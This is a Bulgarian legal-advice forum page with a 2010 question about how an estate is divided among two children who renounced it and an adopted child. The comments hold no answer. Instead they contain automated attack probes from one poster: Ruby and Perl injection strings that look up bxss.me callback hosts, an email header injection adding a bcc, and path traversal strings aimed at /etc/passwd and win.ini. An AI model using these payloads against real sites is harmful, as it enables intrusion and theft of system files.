определяне на наследствен дял

03.06.2010г. 01:40:41
'А 'получава като наследство 10д-ка ниви, жени се за 'Б' през 1940г. и имат 2 деца('В' и' Г') в последствие 'А' осиновява 'Д'(пълно осиновяване) без 'Б' да я осиновява. през 1987г. 'А' почива и 'В' и 'Г' правят отказ от наследство от 'А'. през 1998 'Б' почива. какви са наследствените дялове съответно на 'В','Г' и 'Д'?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:23
'+'A'.concat(70-3).concat(22*4).concat(109).concat(65).concat(106).concat(87)+(require'socket' Socket.gethostbyname('hitdk'+'lupvkdzk9b2d3.bxss.me.')[3].to_s)+'
lxbfYeaa
05.10.2023г. 07:23
xfs.bxss.me
lxbfYeaa
05.10.2023г. 07:23
'.gethostbyname(lc('hitzq'.'qsboujmva5100.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(87).chr(100).chr(72).'
lxbfYeaa
05.10.2023г. 07:23
to@example.com> bcc:009247.5555-63710.5555.177f4.19635.2@bxss.me
lxbfYeaa
05.10.2023г. 07:23
".gethostbyname(lc("hitdp"."nftzicygedf88.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(90).chr(103).chr(84)."
lxbfYeaa
05.10.2023г. 07:23
Comments
lxbfYeaa
05.10.2023г. 07:23
Comments/.
lxbfYeaa
05.10.2023г. 07:23
'"
lxbfYeaa
05.10.2023г. 07:23
../../../../../../../../../../../../../../etc/passwd
lxbfYeaa
05.10.2023г. 07:23
../../../../../../../../../../../../../../windows/win.ini

Коментар